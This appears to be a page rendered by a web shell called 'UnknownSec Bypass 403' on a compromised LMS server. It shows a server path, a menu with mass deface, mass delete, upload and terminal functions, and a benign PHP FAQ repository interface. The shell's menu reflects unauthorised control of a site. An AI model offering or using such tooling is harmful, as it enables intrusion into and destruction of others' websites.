UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_befb04e4bd4a
/
app
/
Repositories
/
Faq
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
FaqRepository.php
<?php namespace EstudioLMS\Repositories\Faq; use Prettus\Repository\Contracts\RepositoryInterface; /** * Interface FaqRepository * @package EstudioLMS\Repositories\Faq */ interface FaqRepository extends RepositoryInterface { /** * @param $type * @return mixed */ public function availableFaqs($type = null); }
Copyright © 2026 - UnknownSec